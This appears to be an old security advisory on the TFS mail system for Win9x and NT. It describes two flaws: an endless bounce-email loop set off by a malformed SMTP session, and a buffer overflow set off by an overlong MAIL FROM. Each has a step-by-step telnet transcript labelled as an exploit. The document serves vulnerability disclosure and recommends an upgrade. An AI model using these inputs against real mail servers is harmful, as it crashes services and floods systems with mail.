COMMAND
TFS mail system
SYSTEMS AFFECTED
Win9x, NT
PROBLEM
FableMan Noxidus found following. TFS mail system 4 (working on
earlier version as well?) makes a FAST loop generating loooots of
emails until its forced to stop by admin. How to reproduce:
telnet TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX 25
typing HELO
typing MAIL FROM:FABLEMAN NOXIDUS
RCPT TO:FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX
DATA
Fix you system
Error found by FableMan Noxidus a #HACK member of IRCNet
.
QUIT
Thats all now the system tries to send to
FIXYOUR SYSTEM.@TARGETSYSTEMRUNNING.TFS.MAIL.GATE.XXX
but that address is wrong soo then it generates a report error
and mails to FABLEMAN NOXIDUS but cos he hasn't included a @ then
he will not go out on internet then the loops starts.. its
generating a reporterror and the loop is his destiny....
The speed of error report generation is about 1 or more email
/sec soo if you start the loop and after 1 hr its a loot of email
generated... until windows or NT hangs cos of it.
Christophe Lesur added following. A buffer overflow and, under
some circumstances and due to inherent TFS architecture, it can
be used for spamming. There is a major buffer overflow in TFS
SMTP 3.2. When you connect to the SMTP service on port 25, you
get the TFS PROMPT. After sending the 'helo' command, if you send
a 'MAIL FROM' larger than 128 bytes, you will crash the SMTP
service with a nice protection fault. It's basically a buffer
overflow and this has been fixed in release 4.0. This is the
exploit :
[clesur@raptor clesur]$ telnet mailhost.victim.com 25
Trying 1.1.1.1...
Connected to mailhost.victim.com.
Escape character is '^]'.
220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2
helo
250 mailhost.victim.com, Hello
mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>
Connection closed by foreign host.
SOLUTION
For theses vulnerabilities, TenFour suggests upgrading to a
version greater than 4.0.